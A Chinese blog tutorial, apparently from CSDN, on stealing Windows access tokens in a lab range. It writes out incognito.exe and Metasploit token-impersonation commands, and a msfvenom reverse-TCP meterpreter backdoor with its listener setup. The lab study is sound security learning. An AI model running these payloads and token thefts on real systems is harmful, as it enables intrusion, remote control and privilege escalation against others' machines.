内网渗透之Token令牌窃取

已于 2022-08-05 16:49:38 修改
阅读量2.3k 收藏 13
点赞数 4
分类专栏: 内网 文章标签: 网络安全
于 2022-08-05 16:43:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44029310/article/details/126110570
版权

文章目录

前言

      本文包括:令牌的基本概念和种类,以及在windows靶场环境下访问令牌的窃取利用,靶场为ATT&CK红队评估实战靶场(二)的DC靶机。

一、Token的作用

     1)令牌(token)是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌将持续存在于系统中,除非系统重新启动。
     2)令牌最大的特点就是随机性,不可预测,黑客或软件无法猜测出令牌。假冒令牌可以假冒一个网络中的另一个用户进行各类操作。所以当一个攻击者需要域管理员的操作权限时候,需要通过假冒域管理员的令牌进行攻击。

二、令牌的种类

  • 访问令牌(Access Token):表示访问控制操作主体的系统对象 。
  • 会话令牌(Session Token):是交互会话中唯一的身份标识符。
  • 密保令牌(Security Token):又叫做认证令牌或硬件令牌,是一种计算机身 份校验的物理设备,例如 U 盾。

      Windows 的 AccessToken 有两种类型:

  • Delegation Token:授权令牌,它支持交互式会话登录 (例如本地用户直接 登录、远程桌面登录访问)
  • Impresonation Token:模拟令牌,它是非交互的会话 (例如使用 net use 访问共享文件夹)。

      注:两种 token 只在系统重启后清除 具有 Delegation token 的用户在注销后,该 Token 将变成 Impersonation,依旧有效。

三、AccessToken 的窃取与利用

1.incognito.exe程序

     1)AccessToken 的窃取与利用需要 administrator 管理员权限。也就是说要提权。
     2)窃取 AccessToken 的方法有:incognito.exe 程序 、InvokeTokenManipulat.ps1 脚本 、MSF 里的 incognito 模块。
     3)下面演示使用incognito.exe程序窃取令牌并利用。先把incognito.exe工具放进靶机,然后使用以下命令。工具下载链接为:https://labs.mwrinfosecurity.com/assets/BlogFiles/incognito2.zip。

命令解释
incognito.exe list_tokens -uAccessToken 的列举(需要 administrator 权限)
incognito.exe execute -c “完整的 Token 名” cmd.exe模拟其他用户的令牌(复制 token)

     4)此时是administrator 权限满足要求,使用incognito.exe程序列举token的用户。
在这里插入图片描述
     5)模拟其他用户的token令牌登录系统,此时我们是管理员用户,使用命令模拟成系统用户,还可以模拟成当前用户和其他的域内普通用户等等。
在这里插入图片描述

2.MSF 下的 incognito 模块

use incognito  #加载incognito模块
list_tokens -u  #列出AccessToken
getuid  #查看当前token
impersonate_token "NT AUTHORITY\SYSTEM"  #模拟system 用户,getsystem 命令,即实现了该命令。如果要模拟其他用户,将 token 名改为其他用户即可
steal_token 1252  #从进程窃取token
getsystem  #提升至system 权限
rev2self  #返回到之前的AccessToken 权限

3.MSF方式令牌窃取靶机演示

     1)先生成一个msf的后门shell.exe。

msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=25001 LHOST=10.10.10.25 -f exe -o shell.exe

在这里插入图片描述
     2)msf开启监听端口。

msfconsole  
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.10.25  // 你设置监听的ip
set lport 25001  // 你设置监听的端口
exploit

在这里插入图片描述
     3)把生成的后门通过各种方法传递到靶机上然后运行。
在这里插入图片描述
     4)成功获取会话。
在这里插入图片描述
     5)进入incognito模块并列举访问令牌,windows下可以列举出授权令牌 (Delegation Token)和模拟令牌(Impresonation)这两种访问令牌。

use incognito  #加载incognito模块
list_tokens -u  #列出AccessToken

在这里插入图片描述
     6)开始伪造令牌,模拟system权限的用户。

	getuid  #查看当前token
	# 模拟system用户,getsystem 命令,即实现了该命令。
	# 如果要模拟其他用户,将 token 名改为其他用户即可
	impersonate_token "NT AUTHORITY\SYSTEM"

在这里插入图片描述
     7)除了可以伪造令牌,也可以从进程里窃取令牌。首先使用 ps 命令列出进程,查看进程用户。
在这里插入图片描述
     8)查看好拥有system权限的进程的pid,然后使用 steal_token命令,窃取进程对应的令牌就有对应的权限。

	steal_token 2228  #从进程窃取token

在这里插入图片描述
     9)直接利用system窃取令牌,然后返回之前的 token。

	getsystem  # 提升至system 权限
	rev2self  # 返回到之前的AccessToken 权限

在这里插入图片描述

Mauro_K
关注
  • 4
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JwtToken令牌工具类
10-25
JwtToken令牌工具类
域内令牌窃取伪造
prettyX的博客
09-13 1297
域内令牌窃取
Windows令牌窃取探究
m0_59598029的博客
08-09 65
本期技术分享,小星将与大家以“Windows令牌窃取”为题展开讨论,从令牌分类、Access Token窃取与利用以及CS利用三个方面展开叙述。
windows—令牌窃取
negnegil的博客
09-10 1237
令牌的定义 令牌是描述进程或者线程安全上下文的一个对象。不同的用户登录计算机后, 都会生成一个Access Token,这个Token在用户创建进程或者线程时会被使用,不断的拷贝,这也就解释了A用户创建一个进程而该进程没有B用户的权限。一般用户双击运行一个进程都会拷贝explorer.exe的Access Token。 Windows下的访问令牌分为: * 授权令牌(Delegation token):交互式会话登陆(例:本地用户登陆、用户桌面等) * 模拟令牌(Impersonation token):非
域渗透之令牌窃取
yy
05-26 1677
用户登录计算机后会生成随机的访问令牌(秘钥),这个令牌会在用户每次的进程操作中不断拷贝,所以能够识别某进程属于某用户。即令牌相当于用户的身份证令牌在系统重启后清除程序/进程能够访问到什么系统资源,取决于进程拿着谁的令牌。所以可以通过伪造令牌的方式能伪造该令牌的所属用户。
05-令牌窃取和伪造
wangluoanquan111的博客
07-30 349
在前几篇文章中给大家介绍了如何从零开始搭建一个属于自己的内网环境以及当我们进入到一个内网环境中,该怎么样判断当前机器所属的环境是工作组还是域?我们需要收集哪些信息?该通过什么方式进行信息收集?从本篇文章开始,我将开始为大家介绍域渗透的思路及方法,本篇文章主要是介绍令牌伪造在各个工具中的应用。**令牌(token)**是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。
内网渗透
weixin_45808483的博客
02-28 1864
域信息搜集命令 1.查询当前环境 whoami && ipconfig /all 2.查询当前域用户 net user /domain 3.查询域控 net time 4.查询域工作组 net group /domain 5.查询域管理用户 net group "domain admins" /domain 6.查询有几台域控制器 需要域权限 net group "Domain controllers" 7.查找域...
[内网渗透]—令牌窃取
Sentiment的博客
12-27 2221
令牌Token)是指系统中的临时秘钥,相当于账户和密码,有了令牌就可以在不知道密码的情况下访问目标相关资源了,这些令牌将持续存在于系统中,除非系统重新启动。
通过token窃取实现降权或者提权
热门推荐
Shanfenglan's blog
12-29 3万+
文章目录前言通过msf实现1.生成木马并以管理员权限运行2.实现提权到system3.降级到普通用户通过incognito工具实现1. 实现提权到system2. 降权到普通user获取TrustedInstaller权限参考文章 前言 windows中token有两种: Delegation token(授权令牌):用于交互会话登录,例如远程桌面 Impersonation token(模拟令牌):用于非交互登录,例如dir远程主机的文c$ 当我们拿到一台主机却不知道如何提权的时候,可以看看是否有高权
使用incognito劫持身份&psexec调用远程cmd
weixin_45612728的博客
01-26 1293
incognito是在kali上可以使用来进行提权的,主要的作用是用于进行提权的或者用来劫持身份的.如果需要进行这些操作,前提是需要开启smb服务,也就是445端口才可以,可以使用一些工具进行爆破smb的账号和密码. 以下实验用到的是一台03的服务器和一台win7的攻击机. 03的ip地址为:192.168.0.212,账号为1,密码也是1 win7的ip地址为:192.168.0.207 1.使用psexec软件进行远程调用03cmd的cmd. win7执行以下命令:psexec.exe \192.1
laravel5.5安装jwt-auth 生成token令牌的示例
10-16
今天小编就为大家分享一篇laravel5.5安装jwt-auth 生成token令牌的示例,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
创建token令牌的算法示例
12-30
这是一个token的示例,众所周知,token是用于后台服务器认证浏览器的一种技术,它弥补了cookie对数据大小限制和安全性问题
Vue axios获取token临时令牌封装案例
10-14
主要介绍了Vue axios获取token临时令牌封装案例,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
C#WEB用户令牌TOKEN验证防止HTTPGETPOST等提交
09-24
C#WEB用户令牌TOKEN验证,防止HTTP、GET、POST等提交包含服务端和客户端源码。Nginx集群,SSL证书的WebApi令牌验证
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8189
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于Linux V4L2视频库、ASLA高级声音框架的远程视频及语音聊天.zip
04-29
基于Linux V4L2视频库、ASLA高级声音框架的远程视频及语音聊天
node-v8.7.0-x86.msi
最新发布
04-29
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
node-v7.7.3-linux-armv6l.tar.gz
04-29
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
香色闺阁 2.56.1.ipa
04-29
香色闺阁 2.56.1.ipa
token令牌生成规则
07-27
令牌生成规则通常是由具体的应用程序或平台决定的。以下是一般情况下常见的 token 生成规则: 1. 随机生成:使用随机算法生成一串随机字符或数字作为令牌。这种方法简单快捷,但可能存在重复或者易于被猜测的风险。 2. 哈希算法:使用哈希算法对特定的数据进行计算,生成唯一的令牌。这种方法可以确保生成的令牌是唯一且不可逆的。 3. UUID:使用通用唯一标识符(Universally Unique Identifier,UUID)生成令牌。UUID 是一个标准的 128 位数字,保证了在全球范围内的唯一性。 4. Json Web Token(JWT):JWT 是一种基于 JSON 的开放标准,用于在网络应用间传递信息。JWT 由三部分组成:头部、载荷和签名。其中载荷部分可以包含自定义的信息,并使用密钥进行签名以确保安全性。 5. OAuth 令牌:OAuth 是一种开放标准,用于授权第三方应用访问受保护资源。OAuth 令牌可以通过授权服务器颁发,包括访问令牌和刷新令牌等。 需要根据具体的应用场景和安全需求选择合适的令牌生成规则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值